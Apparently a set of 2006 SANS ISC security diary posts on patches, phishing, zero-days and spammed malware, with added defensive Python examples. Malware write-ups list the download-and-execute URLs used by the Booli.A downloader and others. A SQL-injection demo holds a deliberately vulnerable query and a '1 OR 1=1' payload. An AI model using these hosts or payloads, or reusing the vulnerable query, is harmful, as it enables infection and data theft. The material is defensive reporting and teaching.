Root-Level Exploit for OSX LaunchD Service
You can get more information about the vulnerability and exploit from Security Focus.
If you haven't already installed the update, time to get moving.
Thanks to Juha-Matti for the information.
OpenOffice.org Vulnerabilities
OpenOffice.org has additional security notes on their site that address the three specific issues:
- Java Applets
It is possible for some Java applets to break out of the secure "sandbox" in which they are normally constrained. The applet code could potentially have access to the entire system with whatever privileges the current user has.
A workaround is provided to temporarily disable support for Java applets. Instructions are provided for both 1.1.x and 2.0.x.
- Macros
A flaw with the macro mechanism could allow an attacker to include certain macros that would be executed even if the user has disabled document macros. Such macros could potentially have access to the entire system with whatever privileges the current user has.
There is no workaround for this issue.
- File Format
A flaw in the parsing of the XML file formats allows for possible buffer overflows in specially malformed documents. The buffer overflow can crash the OpenOffice.org application and might be exploitable for arbitrary code-execution.
There is no workaround for this issue.
Thanks to Juha-Matti for the heads-up.
0 Comments
iTunes < 6.0.5 vulnerability & patch released
http://docs.info.apple.com
APPLE-SA-2006-06-29 iTunes 6.0.5
iTunes 6.0.5 is now available and, in addition to its other content,
fixes the following security issue:
CVE-ID: CVE-2006-1467
Available for: Mac OS X v10.2.8 or later, Windows XP / 2000
Impact: An integer overflow in iTunes could cause a denial of
service or lead to the execution of arbitrary code
Description: The AAC file parsing code in iTunes versions prior
to 6.0.5 contains an integer overflow vulnerability. Parsing a
maliciously-crafted AAC file could cause iTunes to terminate or
potentially execute arbitrary code. iTunes 6.0.5 addresses this
issue by improving the validation checks used when loading AAC
files. Credit to ATmaCA working with TippingPoint and the Zero Day
Initiative for reporting this issue.
Cisco Wireless Access Point Vulnerability Announced
Cisco has released a vulnerability disclosure for their Wireless Access Points:
http://www.cisco.com/warp
The vulnerability is in the web interface for the APs and could allow wiping of the security configuration and access to the administrative interface without authentication.
To quote Cisco:
A vulnerability exists in the access point web-browser interface when Security > Admin Access is changed from Default Authentication (Global Password) to Local User List Only (Individual Passwords). This results in the access point being re-configured with no security, either Global Password or Individual Passwords, enabled. This allows for open access to the access point via the web-browser interface or via the console port with no validation of user credentials.
The following access points are affected if running Cisco IOS® Software Release 12.3(8)JA or 12.3(8)JA1 and are configured for web-interface management:
- 350 Wireless Access Point and Wireless Bridge
- 1100 Wireless Access Point
- 1130 Wireless Access Point
- 1200 Wireless Access Point
- 1240 Wireless Access Point
- 1310 Wireless Bridge
- 1410 Wireless Access Point
Deja Vu - Advances in Rootkit malware
Always get permission - VA stolen laptop recovered
New version of OSX available
Apple announced yesterday that a new version of OSX (10.4.7) is available and recommended for all users:
http://www.apple.com/support
To quote the announcement:
It includes fixes for:
- preventing AFP deadlocks and dropped connections
- saving Adobe and Quark documents to AFP mounted volumes
- Bluetooth file transfers, pairing and connecting to a Bluetooth mouse, and syncing to mobile phones
- audio playback in QuickTime, iTunes, Final Cut Pro, and Soundtrack Pro applications
- ensuring icons are spaced correctly when viewed on desktop
- determining the space required to burn folders
- iChat audio and video connectivity, creating chat rooms when using AIM
- importing files into Keynote 3
- PDF workflows when using iCal and iPhoto
- reliable use of Automator actions within workflows
- importing and removing fonts in Font Book
- syncing addresses, bookmarks, calendar events and files to .Mac
- compatibility with third party applications and devices
- previous standalone security updates
SHA1: MacOSXUpd10.4.7Intel.dmg = 2a25ed61d586b71ba7282fb896b2c910785ff358
SHA1: MacOSXUpd10.4.7PPC.dmg= 223d1fc9197a6a96c9d2f2a9110d37abc219c3a6
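Apple publishes the SHA1 digests above so that you can confirm the image you downloaded is the one they shipped. The script below is an added example (my code, not Apple's or the ISC's) of doing that check properly: hash the file in chunks so a large .dmg never has to fit in memory, compare against the published table with a constant-time comparison, and fail closed when the filename is not in the table. The `PUBLISHED_DIGESTS` table is copied from the announcement quoted above; the `algorithm` parameter is there because the same routine works for SHA-256 when a vendor publishes that instead. One caveat a practitioner will want: a digest fetched from the same page as the download only protects against corruption, not substitution, unless it reaches you over a separately trusted channel.

```python
import hashlib
import hmac

# Digests copied from the announcement quoted above; filenames are the keys.
PUBLISHED_DIGESTS = {
    "MacOSXUpd10.4.7Intel.dmg": "2a25ed61d586b71ba7282fb896b2c910785ff358",
    "MacOSXUpd10.4.7PPC.dmg": "223d1fc9197a6a96c9d2f2a9110d37abc219c3a6",
}


def digest_bytes(data: bytes, algorithm: str = "sha1", chunk_size: int = 1 << 20) -> str:
    """Hash an in-memory byte string in fixed-size chunks.

    The chunking mirrors the file loop below so that both paths are exercised
    the same way; a multi-hundred-megabyte .dmg is never read at once.
    """
    h = hashlib.new(algorithm)
    for offset in range(0, len(data), chunk_size):
        h.update(data[offset:offset + chunk_size])
    return h.hexdigest()


def digest_file(path: str, algorithm: str = "sha1", chunk_size: int = 1 << 20) -> str:
    """Hash a file on disk chunk by chunk."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def matches_published(actual_hex: str, expected_hex: str) -> bool:
    """Case-insensitive, constant-time comparison of two hex digests."""
    return hmac.compare_digest(actual_hex.lower(), expected_hex.lower())


def verify_download(name: str, data: bytes, published: dict = PUBLISHED_DIGESTS) -> bool:
    """True only if `data` hashes to the digest published for filename `name`.

    An unknown filename fails closed instead of being treated as 'nothing to check'.
    """
    expected = published.get(name)
    if expected is None:
        return False
    return matches_published(digest_bytes(data), expected)


def verify_file(path: str, name: str, published: dict = PUBLISHED_DIGESTS) -> bool:
    """Same check for an image already saved to `path`."""
    expected = published.get(name)
    if expected is None:
        return False
    return matches_published(digest_file(path), expected)


if __name__ == "__main__":
    import sys
    # Usage: python verify_update.py MacOSXUpd10.4.7Intel.dmg /path/to/downloaded.dmg
    ok = verify_file(sys.argv[2], sys.argv[1])
    print("OK" if ok else "MISMATCH")
    sys.exit(0 if ok else 1)
```

Run it with the published filename and the path of the file you actually downloaded; a non-zero exit on mismatch makes it usable from a deployment script.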
Two new Internet Explorer vulnerabilities disclosed including PoC
The first is a critically rated IE vulnerability in the use of HTA applications (CLSID 3050f4d8-98B5-11CF-BB82-00AA00BDCE0B) to trick a user into opening a file by double-clicking it. The file has to be accessible through either SMB or, according to the advisory, WebDAV, and can be located on a remote site. The currently available PoC that was published is limited in that it requires the user to double-click an icon to execute a potentially malicious payload, but we can expect to see creative use of this exploit in the wild very soon. The workaround for this appears to be disabling active scripting.
The second vulnerability is related to the handling of the object.documentElement.outerHTML property. Abuse of this property allows an attacker to retrieve remote content in the context of the web page currently being viewed by the user. This vulnerability can be potentially nasty, as attackers can use it to retrieve data from other web sites the user is logged into (for example, webmail) and harvest user credentials. Several handlers have spent a little more time validating this particular issue and, while it is a subtle exploit and rated a lower-level risk, it has raised some of our neck hairs.
Microsoft is investigating both issues and Secunia posted a PoC web page for the second vulnerability that you can find at http://secunia.com/internet_explorer_information_disclosure_vulnerability_test.
Regarding the second vulnerability, what's interesting is that we were able to reproduce this even when using Mozilla Firefox.
We have not received any reports of these vulnerabilities being actively exploited in the wild. Please let us know if you have more information and we'll update the diary accordingly.
Another worthy 'Handler tools' mention, applicable as a general protection tool and gaining increased use for testing malicious code and reviewing potentially malicious websites, is the Sandboxie tool. Browse safely over to http://www.sandboxie.com.
--
Bojan Zdrnja
William Salusky
Word macro trojan dropper and (another) downloader
We've seen a lot of new malware being spammed in last couple of hours.
The first malware exploits an old vulnerability in Microsoft Word, MS01-034 (http://www.microsoft.com/technet/security/Bulletin/MS01-034.mspx). This vulnerability allows an attacker to execute embedded macros regardless of the user's Microsoft Word macro settings. Of course, as this is a pretty old vulnerability, only terribly outdated installations will be affected. If you are running any newer version of Microsoft Word, macro settings are on High by default so only macros signed by trusted sources are executed; all other macros are disabled. A user would have to change this setting to Medium (so they get asked) or Low in order to run this macro. The Word document comes in a ZIP file and, once opened, installs a Trojan. Detection on the Word document is pretty good at the moment.
The document pretends to list computer prices:
The other malware is a plain old (and boring?) downloader, but we've seen a large number of e-mails being spammed with it. The downloader uses typical social engineering to trick the user into opening the archive. Besides the e-mail telling the user there's a nice photo in the attachment, the executable name will be something like DC0019.JPG__[lots of _]__JPG.exe.
The executable always seems to be in a ZIP archive, but sometimes it is encrypted (and in this case the password is in the e-mail body) and sometimes it's not.
Once executed, the downloader will install on the system and try to download two files:
http:// 206.204.52.54 /img/util/logo_nav.jpg
which is a Symantec logo (more social engineering) and
http:// 218.239.223.224 /flash/menu.swf
this is a site in Korea and the last time we checked the file was not there.
AV detection is pretty low at the moment and only a couple of AV products detected this: Symantec, NOD32, Norman, Trend Micro, Sophos. They either detect it as a downloader or generically (Bloodhound.W32.EP in Symantec's case).
New Mambo, Joomla releases fix security vulnerabilities
All versions of Mambo prior to 4.6RC1 are vulnerable to a SQL injection attack in the weblinks.php file. You can patch this manually, as only two variables need to be escaped, or you can download patches from the Mambo web site, http://www.mamboserver.com.
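The weblinks.php fix amounts to making sure request parameters cannot alter the SQL the script builds. As an added illustration of that class of bug and its fix (this is my code, not Mambo's or Joomla's; the `weblinks` table and its columns are constructed stand-ins, not either project's real schema), here is a query that splices the parameter into the SQL text beside one that validates the type and binds the value. It uses Python's sqlite3 module so it runs offline; the same distinction applies to any database driver that supports bound parameters.

```python
import sqlite3


def make_sample_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for a 'weblinks' table.

    Column names are my own stand-ins, not Mambo's real schema.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE weblinks (id INTEGER PRIMARY KEY, catid INTEGER, "
        "title TEXT, published INTEGER)"
    )
    conn.executemany(
        "INSERT INTO weblinks (catid, title, published) VALUES (?, ?, ?)",
        [(1, "Public link", 1), (1, "Unpublished draft", 0), (2, "Other category", 1)],
    )
    conn.commit()
    return conn


def links_vulnerable(conn: sqlite3.Connection, catid: str) -> list:
    """VULNERABLE: the request parameter is spliced into the SQL text unescaped.

    A value such as '1 OR 1=1' rewrites the WHERE clause and returns rows the
    caller was never meant to see (here the unpublished one and another category).
    """
    sql = f"SELECT title FROM weblinks WHERE catid = {catid} AND published = 1"
    return [row[0] for row in conn.execute(sql)]


def links_fixed(conn: sqlite3.Connection, catid: str) -> list:
    """FIXED: validate the parameter's type, then bind it as a query parameter.

    Binding keeps data separate from SQL structure, so no value can change the
    query; the type check rejects garbage early with a clear error.
    """
    if not catid.isdigit():
        raise ValueError("catid must be a non-negative integer")
    sql = "SELECT title FROM weblinks WHERE catid = ? AND published = 1"
    return [row[0] for row in conn.execute(sql, (int(catid),))]


if __name__ == "__main__":
    db = make_sample_db()
    print("vulnerable, normal input :", links_vulnerable(db, "1"))
    print("vulnerable, injected     :", links_vulnerable(db, "1 OR 1=1"))
    print("fixed, normal input      :", links_fixed(db, "1"))
    try:
        links_fixed(db, "1 OR 1=1")
    except ValueError as e:
        print("fixed, injected          : rejected ->", e)
```

Escaping the two variables, as the Mambo patch does, closes the hole for those two parameters; binding the values closes it for every parameter the script will ever take, which is why it is the fix to reach for when you maintain the code yourself.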
We've also received reports that some vulnerabilities in previous versions of Mambo (older than 4.5.3) are being actively exploited, so be sure that you are running the latest version, with the security patch installed. If we get more information about attacks we'll post an update.
The new release of Joomla, 1.0.10, also fixes a couple of security vulnerabilities. Joomla is also vulnerable to SQL injection attacks, of which 3 rated critical were fixed in the latest release. As the latest version fixes other security vulnerabilities and numerous bugs, users are urged to upgrade. You can find more information on the Joomla web site, http://www.joomla.org.
Reminder about MS06-025
The original patch from Microsoft caused issues with dial-up. A new patch was released June 21 (or thereabouts) that addressed this issue. Exploit code is available that leverages this issue. This allows an authenticated attacker to execute arbitrary code on Windows 2000 and XP SP2 systems. Previous versions allow unauthenticated attackers to execute arbitrary code; this is your garden-variety "bad-thing(tm)."
Excel Issue Scorecard
CVE-2006-3059 aka "Excel Repair Mode" http://www.microsoft.com/technet/security/advisory/921365.mspx
Exploited by: Mdropper.G, Booli.A, Flux.E, Booli.B
CVE-2006-3086 aka "Long Hyperlink" http://blogs.technet.com/msrc/archive/2006/06/20/437826.aspx
Exploited by: Urxcel.A, and three known public exploit code examples
CVE-2006-3014 aka "Shockwave vulnerability"
Exploited by proof of concept code Flemex.A
The workaround is a killbit.
Field Day Exercise
Over this weekend, ham radio operators (who aren't at the World Cup) are participating in an annual emergency communications preparations exercise known as Field Day (http://en.wikipedia.org/wiki/Field_day). It emphasizes the use of emergency and alternative power sources. In the spirit of this exercise I'm running on backup power today to determine how long my setup will last and work out the bugs.
It has not been going smoothly today, but that's the point of the exercise I suppose.
How long can your critical systems operate without grid power?
Sudo For Windows
Malware propagation information from Microsoft
Microsoft recently released a report on the statistics they are collecting via MSRT.
There is a nice executive summary but please read beyond that. One security trade publication clearly misread the summary and posted a misquote (62% of computers infected with backdoor). That is not what the report states. The 62% number is the percentage of machines that had malware removed from them by MSRT AND had a backdoor installed on them. Restated: more than half of the machines where an infection was detected and removed also had remote control backdoors on them. No surprise there really. Although there are ways for the hackers to use a system without a backdoor tool installed, for the most part the hackers want to be able to remotely upgrade and control the systems they have compromised.
The actual report comes from the Rapid Response Team Waggener Edstrom Worldwide.
Overall the report is very good. There are lots of nice charts and graphs. The author did a good job normalizing statistics but also provided the unnormalized view. They don't really mention false negatives until nearly the end of the document. I do not completely agree with their malware categories; however, since those are well defined up front, I had no problem understanding what they meant by email worm, P2P worm, IM worm, exploit worm, backdoor Trojan, rootkit or virus. They also claim that MSRT is part of a defense in depth even when you have another antivirus package installed. Due to its lack of realtime protection I would say it's not defense at all. It's reactive and only comes into play after the fact of infection. Since it is also fairly limited in the malware it detects and the signatures are usually only updated once a month, I don't know of any current antivirus package that would miss a virus that MSRT would detect. So I do not agree this provides defense in depth. I do however see serious benefit to running MSRT. It certainly has contributed to the effort of getting infected systems cleaned.
Some other fun facts I gleaned from this report:
MSRT only removes live malware or malware that will be autorun during a reboot.
1 computer in 355 had malware that was recognized and removed.
5% of the root kits removed were WinNT/F4IRootkit (aka the sony root kit) with about 420k removals from 250k machines.
35% of the computer infected were infected via the end user clicking or opening something.
20% of the computers cleaned had been infected sometime in the past.
So if you have a little time and you are interested in malware propagation I recommend reading this report.
isc.org provides attack mitigation
Some services respond to potentially spoofed UDP packets.
MITIGATION:
Upgrade to bind 9.3.3b1.
Disable or restrict access to UDP services that don't need to be open to the internet.
The basic issue here is very old. It was originally reported in 1999. The CVE number for it is CVE-1999-0103. http://nvd.nist.gov/nvd.cfm?cvename=CVE-1999-0103
"Echo and chargen, or other combinations of UDP services, can be used in tandem to flood the server, a.k.a. UDP bomb or UDP packet storm."
If you consider DNS to be one side of an "other combination" of UDP services this is not new. What is new is that this version of bind will not send FORMERR packets if the original packet came from the set of well known UDP ports listed above. ISC.ORG has added some code to mitigate attacks with well known spoofed source ports. I do not know of any other DNS software vendor that has added this capability.
7 years ago CERT and others warned us not to leave things like echo and chargen open.
However, some OSes and network equipment vendors still ship products with those types of services enabled by default and open to the world. Those services haven't been in common usage since the 1990s.
--- 9.3.3b1 released ---
<SNIP>
1951. [security] Drop queries from particular well known ports.
<SNIP>
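The BIND changelog line above is terse, so here is the idea behind it spelled out as an added example (my code, modelling the policy, not ISC's implementation): a DNS server that receives a query claiming to come from UDP port 7 or 19 sends nothing back, not even a FORMERR, because any datagram returned to a spoofed echo or chargen port would be answered by that service and the two servers would feed each other. Echo and chargen are the pair named in CVE-1999-0103; adding daytime (13) and time (37) to the set is my assumption, since they answer any datagram the same way. The packets are constructed sample records using documentation address ranges.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# UDP services that answer any datagram with another datagram. Echo (7) and
# chargen (19) are the pair named in CVE-1999-0103; daytime (13) and time (37)
# behave the same way and are my addition to the set.
REFLECTOR_PORTS: Dict[int, str] = {7: "echo", 13: "daytime", 19: "chargen", 37: "time"}
DNS_PORT = 53


@dataclass(frozen=True)
class UdpDatagram:
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    length: int


def classify(pkt: UdpDatagram) -> str:
    """'drop' for a DNS query whose source port is a reflector service, else 'accept'.

    No real resolver or stub uses these as ephemeral source ports, so a query
    claiming to come from one is either spoofed or misconfigured.
    """
    if pkt.dst_port == DNS_PORT and pkt.src_port in REFLECTOR_PORTS:
        return "drop"
    return "accept"


def decide_reply(pkt: UdpDatagram, malformed: bool) -> Optional[str]:
    """Model the server's response policy; None means 'send nothing'.

    Even a FORMERR is a datagram. Sent back to a spoofed echo/chargen port it
    would be answered by that service, which is the ping-pong being prevented.
    """
    if classify(pkt) == "drop":
        return None
    return "FORMERR" if malformed else "ANSWER"


def filter_queries(packets: List[UdpDatagram]) -> Tuple[List[UdpDatagram], List[UdpDatagram]]:
    """Split a packet list into (accepted, dropped)."""
    accepted, dropped = [], []
    for p in packets:
        (dropped if classify(p) == "drop" else accepted).append(p)
    return accepted, dropped


def summarise_drops(dropped: List[UdpDatagram]) -> Dict[str, int]:
    """Count dropped queries by the reflector service they claimed as source."""
    counts: Dict[str, int] = {}
    for p in dropped:
        name = REFLECTOR_PORTS[p.src_port]
        counts[name] = counts.get(name, 0) + 1
    return counts


# Constructed sample traffic (documentation address ranges, not real hosts).
SAMPLE_PACKETS = [
    UdpDatagram("192.0.2.10", 34567, "198.51.100.53", 53, 60),  # ordinary query
    UdpDatagram("192.0.2.20", 19, "198.51.100.53", 53, 60),     # claims chargen as source
    UdpDatagram("192.0.2.21", 7, "198.51.100.53", 53, 60),      # claims echo as source
    UdpDatagram("192.0.2.30", 19, "198.51.100.53", 123, 48),    # not DNS: out of scope here
]


if __name__ == "__main__":
    accepted, dropped = filter_queries(SAMPLE_PACKETS)
    print(f"accepted={len(accepted)} dropped={len(dropped)} "
          f"by_service={summarise_drops(dropped)}")
```

The same rule is easy to express as a packet filter in front of a resolver that does not have the BIND change, and the per-service counts are worth graphing: a sudden rise is an early sign that someone is spoofing your server's address.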
Top 100 security tools
You can find the list at http://SecTools.Org
From that link
'I (Fyodor) asked users from the nmap-hackers mailing list to share their favorite tools, and 3,243 people responded. This allowed me to expand the list to 100 tools, and even subdivide them into categories. Anyone in the security field would be well advised to go over the list and investigate tools they are unfamiliar with. I discovered several powerful new tools this way. I also will be pointing newbies to this site whenever they write me saying "I don't know where to start".
Respondents were allowed to list open source or commercial tools on any platform. Commercial tools are noted as such in the list below. No votes for the Nmap Security Scanner were counted because the survey was taken on an Nmap mailing list. This audience also means that the list is slightly biased toward "attack" tools rather than defensive ones.'
Opera 9 long href PoC
Yahoo! Login Server Problems
ISC Handlers
Opera 9.0 released
http://www.opera.com/index.dml
New Bagle in Encrypted Zip File Attachments
Comments on 0day
The first question I pose is: why the sudden increase in vulnerabilities that are published as 0day instead of responsibly disclosed? This isn't intended to be a comment on full-disclosure. But if you look over the past couple of years, almost all vulnerabilities that are discovered by actual researchers (not criminals) were disclosed responsibly to Microsoft. Is the researching community becoming disenchanted with the long Microsoft patch cycle? Is there more incentive (fame) for researchers to disclose full details to bugtraq or full-disclosure? Is there more incentive (financial) to sell an exploit to iDefense, 3com, or the highest bidder on eBay? If you are a software vendor, what are you doing to ensure that vulnerability researchers are kept happy and disclosing security bugs responsibly?
Now here is where I can feel people firing up their flamethrowers. There has been lots of panic and rumors recently about 0day bugs. And it isn't just focused on Microsoft products. We occasionally get e-mail asking if we know about 0day in OpenSSH, Apache, and PHP. The question shouldn't be whether 0day exists. Because 0day exists and it will always exist.
The question is whether you or your organization would be the target of such an exploit? The time is long gone for an exploit author to embed his nice 0day into a worm and let it run rampant through the Internet. Today, 0day exploits are more likely to be used for military purposes, financial crime, and possibly terrorist activities (although, probably not).
So in reality, the organizations that really need to be concerned about 0day are the ones responsible for protecting military/government assets, financial institutions, and critical infrastructure agencies. Since you know 0day exists and if you are a target, what are you doing to protect yourself? How do you protect against, detect, and respond to unknown vulnerabilities?
For the rest of the folks out there (small/medium businesses, hobbyists)... Should you worry about 0day? Usually not, but if you have all the other critical security components in place then go ahead.
I'm curious to know what kinds of 0day protection systems people have in place? In the *NIX world, there are some fairly decent (and free) options for protection: Grsecurity, NSA SE Linux, Systrace, LIDS, ProPolice GCC patch and others. How about the Windows side? There doesn't seem to be much for the folks without hardcore $$. CORE security has something new called Force (http://force.coresecurity.com/) that looks quite promising. There is also a good list of commercial products for Windows and some comments compiled by fellow handler Jason Lam here: http://isc.sans.org/diary.php?storyid=635
In summary, you should expect 0day to be alive and well for your favorite operating systems, daemons, and applications. And if it concerns you, then do something about it instead of waiting to get smacked with it later. You will sleep better at night and not be frustrated at your favorite software vendor when they take 6+ months to patch simple little vulnerabilities.
New Excel 0day (Are we evolving or going in circles?)
Today there is news of another 0day vulnerability in Microsoft Office. You can check your favorite vulnerability notification service for all the gory details. Someone wrote asking for comments and honestly I don't have any step-by-step instructions for defending against this specific threat. All of the general high-level recommendations from the MS Word 0day a couple of weeks ago still apply. Perhaps we will have something more detailed later when the details are more clear.
Instead, here are some thoughts about the current state of vulnerability discoveries. If you have followed along with the industry in the last couple of years, you have probably noticed that remote root/administrator type of bugs have slowly disappeared and now seem to be fairly rare. Most vulnerability researchers that are publishing advisories now seem to focus on web applications and clients (web browsers, Office, etc). I am honestly expecting to see a healthy stream of client vulnerabilities in Office applications over the next 2-3 years. Several years ago, nobody cared too much about exploitable bugs in client side applications because remote bugs were still readily available. Of course, given the recent media attention about the MS Word 0day exploit, a lot of vulnerability researchers are now hitting Word with every available fuzzer that they have.
So now we have a scenario where there will be a good number of 0day vulnerabilities discovered in client-side applications like MS Office and OpenOffice. Users will be advised not to open documents from unknown persons. So have we evolved? Or have we just jumped back in time ten years when every aspiring script kiddie was writing VBA Macro viruses?
Keep reading for another article about 0day...
The dangers of shared web hosts
Space on a shared server is OK for personal use. But you should think twice before using it for commercial, in particular business-critical, use. Your web site's security will depend on a few hundred other users on the same system doing the right thing. A bad PHP script on one virtual server could lead to a compromise of all web sites hosted on the same system.
If you have to use a virtual host, try to follow these tips to make things "as secure as possible":
- Don't go with the lowest bidder. You still rely on the hosting company to maintain the server and there is not much maintenance that can be done for $1/month.
- Check references. Look at sites like zone-h.org for defacement history and netcraft.com for stats like uptime.
- Keep solid backups of your files on a local system!
- Avoid files and directories that are writeable by anybody but yourself. In particular, avoid files writable by the web server.
- Do not rely on any access control provided by php/perl/cgi scripts. Other users may bypass it with their own scripts.
- Know your customers. Avoid handing out accounts before billing details are validated. Try to verify credit card payments by phone.
- Consider virtual systems (Xen, VMware...). While not perfect, it's a lot better than housing all users on the same system.
- Chrooted user accounts can be almost as good as virtual hosts. But they can be hard to maintain, and they still use the same web server process, which may cross over chrooted users.
- Monitor user activity carefully.
- Use a host-based IDS to detect intrusions quickly.
- Got backups?
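The advice above about writable files is easy to turn into a recurring check. The script below is an added example (mine, not from the diary or any hosting product): it walks a directory tree and reports every file or directory that is world-writable, and optionally everything owned by the web server's uid, which is the "writable by the web server" case. The sample tree it builds is constructed for the demonstration; `web_uid` is a parameter you would fill in with the uid your httpd runs as, since that value is not on the page.

```python
import os
import stat
import tempfile
from typing import List, Optional, Tuple


def find_risky_files(root: str, web_uid: Optional[int] = None) -> List[Tuple[str, str]]:
    """Walk `root` and report entries that are world-writable or owned by the web server.

    Returns (path relative to root, reason) pairs. Symlinks are skipped because
    their own mode bits mean nothing; what matters is the target they point at,
    which the walk reaches on its own if it lives under root.
    """
    findings: List[Tuple[str, str]] = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or unreadable; not something this check can fix
            if stat.S_ISLNK(st.st_mode):
                continue
            rel = os.path.relpath(path, root)
            if st.st_mode & stat.S_IWOTH:
                findings.append((rel, "world-writable"))
            if web_uid is not None and st.st_uid == web_uid:
                findings.append((rel, "owned by web server uid"))
    return findings


def build_sample_tree() -> str:
    """Constructed sample: a correctly protected page and a world-writable config file."""
    root = tempfile.mkdtemp(prefix="sharedhost-")
    uploads = os.path.join(root, "uploads")
    os.mkdir(uploads)
    os.chmod(uploads, 0o755)
    safe = os.path.join(root, "index.html")
    loose = os.path.join(uploads, "config.inc")
    for path in (safe, loose):
        with open(path, "w") as f:
            f.write("sample\n")
    os.chmod(safe, 0o644)
    os.chmod(loose, 0o666)  # the mistake the list above warns about
    return root


if __name__ == "__main__":
    import sys
    # Usage: python audit_perms.py /path/to/site [web_uid]
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_tree()
    uid = int(sys.argv[2]) if len(sys.argv) > 2 else None
    for rel, reason in find_risky_files(target, uid):
        print(f"{reason:24s} {rel}")
```

Run it from cron against your document root and diff the output against the previous run; a new world-writable file appearing under a directory you did not touch is exactly the kind of change the list above says to watch for.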
Rumors about IIS 6.0 issues
Update: All feedback we received so far points to the microsoft.fr being an isolated issue.
Some persistent rumors talk about a possible new exploit (0-day?) against IIS 6.0. The defacement of experts.microsoft.fr is used as evidence. At this point, we have nothing to support that claim. If you have any additional evidence, please let us know. An image of the alleged defacement can be found at Flickr: http://www.flickr.com/photos/affandesign/169734004/in/photostream/. Also see http://www.zone-h.org/content/view/4767/31/ for a mirror of the defacement.
Empty emails?
There is some speculation it may be malware related, as in a poorly written piece of code spewing out empty emails. One other theory involves confirming known good addresses to seed a new piece of malware or spam. Is this related to Yamanner (sp?)?
Cheers,
Adrien
Excel new vuln FAQ
Update: A Perl script was published on Milw0rm which appears to exploit *some* Excel vulnerability. It creates a spreadsheet including a very long URL. Once the user clicks on the URL, Excel will crash. As our reader Dominic pointed out, the script does not claim to be the 0day under discussion. VirusTotal does not trigger any signatures based on the Excel file generated by the exploit.
Juha-Matti, a regular ISC contributor has written up some information into a FAQ. This is with regards to a recently discovered previously unknown vulnerability in Microsoft Excel. Gotten tired of the phrase '0day'? I sure have.
http://blogs.securiteam.com/?p=451
Although I do not entirely agree with all of his advice, I think that the first and only defense is - defense in depth.
Do NOT rely solely on antivirus.
Do NOT rely solely on filtering by extension.
Do NOT open Excel files that appear unsolicited in your mailbox.
No single tool or measure is sufficient.
I am hoping that the point is getting across: do not rely on traditional defensive measures; it is quite likely they will prove inadequate against a custom-made targeted trojan built just to penetrate your infrastructure, particularly one using an undisclosed vulnerability. No signature-based tool can help you in this case.
Cheers,
Adrien
(Maddison's Baba)
Update on the Paypal Phish Phlaw
PayPal fixes phishing hole
Thanks to one of our readers for supplying us with the information.
Happy Father's Day
So to my fellow Handler "guys" I say Happy Father's Day to some of the best dad's I know. To my own dad who will celebrate 72 years next week I say thanks for all you do. To all of you I say Happy Father's Day.
Known Issues for the MS06-025
Microsoft Security Response Blog
Thanks to Juha-Matti for calling this to our attention.
Phishes, Phlaws and Phurther Network Phollies
We've received a report of a potential flaw in the PayPal website that is being used to steal credit card and other personal information from PayPal users.
The scam works by tricking users into accessing a URL hosted on the genuine PayPal web site. The URL uses SSL to encrypt information transmitted to and from the site, and a valid 256-bit SSL certificate is presented to confirm that the site does indeed belong to PayPal.
When the victim visits the page, they are presented with a message that has been 'injected' onto the genuine PayPal site that says, "Your account is currently disabled because we think it has been accessed by a third party. You will now be redirected to Resolution Center." After a short pause, the victim is then redirected to an external server, (apparently somewhere in Korean IP space) which presents a very convincing fake PayPal Member log-In page.
Logging in sends the PayPal username and password to the bad guys and leads to another page asking for more information (social security number, credit card number ...) to remove the limits on the access to their account.
More to come as we confirm information.
FDIC Phish
Juha-Matti dropped us a link to a newly added US-Cert Advisory detailing a scam targeting customers of FDIC insured institutions.
Adobe Reader Update
Details can be found on Adobe Support Knowledgebase article 327817
Reports of Excel 0-Day
In the meantime, we continue to recommend the same defenses we recommended with the Word 0-day from last month located at http://isc.sans.org/diary.php?storyid=1347. These very general best practices should help alleviate the danger until Microsoft releases a patch or more specific workarounds.
Update - We've received reports (thanks Juha-Matti) that Symantec is detecting this attack.
Trojan.Mdropper.J is the detection for the malicious .xls which uses the 0-day exploit to drop Downloader.Booli.A.
The Symantec website also reports ..
Downloader.Booli.A may arrive on the compromised computer, dropped by Trojan.Mdropper.J, with the following name:
%System%\svc.exe
Note: %System% is a variable that refers to the System folder. By default this is C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).
When Downloader.Booli.A is executed, it performs the following actions:
- Attempts to run Internet Explorer and inject its code into Internet Explorer to potentially bypass firewalls.
- Attempts to download a file from the following location:
[http://]210.6.90.153:7890/svcho[REMOVED]
Note: At the time of writing the remote file was not available.
- Saves the file as the following and, if the download was successful, executes the file:
c:\temp.exe
- Creates an empty file before exiting:
c:\bool.ini
We'll pass on more information as we receive it.
-Chris
Potential Patch Problem with MS06-025
not able to dial up after applying MS06-025 (KB911280). I verified this on a test machine and it looks like it breaks dial up. We have some scripts that need to be run in order to authenticate the user properly after the dial up connection is established. It looks like the patch prevents scripts from running at all. Even when I turned on the terminal window (in interactive logon and scripting) I can't log in manually at all. After the connection is established I can see the Username prompt in the terminal window but I can't enter any data. Uninstalling the patch fixes this."
UPDATE: The case number and guidance we received from Microsoft has been changed. Sorry for the initial confusion that some of you may have faced trying to use this case number. Here is the updated guidance from Microsoft that we have been given. They want each customer to open their own case. You need to mention MS06-025 breaking dial up and your case will be created and then added to the master case. The number to use to contact Microsoft for free support, for issues such as these, remains the same: 1-(866) PC-SAFETY.
Sendmail Multi-Part MIME Message Handling Denial of Service vulnerability
The newly reported Sendmail vulnerability is caused by an error in the termination of the recursive "mime8to7()" function when performing MIME conversions. It can be exploited to cause a sendmail process to crash when it runs out of stack space while processing a deeply nested malformed MIME message. It can be exploited by malicious people to cause a DoS (Denial of Service). You can apply the patch or upgrade to version 8.13.7.
Affected versions: 8.13.6 and prior.
Additional vulnerability information can be found at the following sites:
http://www.sendmail.org/releases/8.13.7.html
http://www.kb.cert.org/vuls/id/146718
E-mails with malicious links targeting Australia
All e-mails we've received have the same content, but the URL seems to be moving around. The body is pasted below:
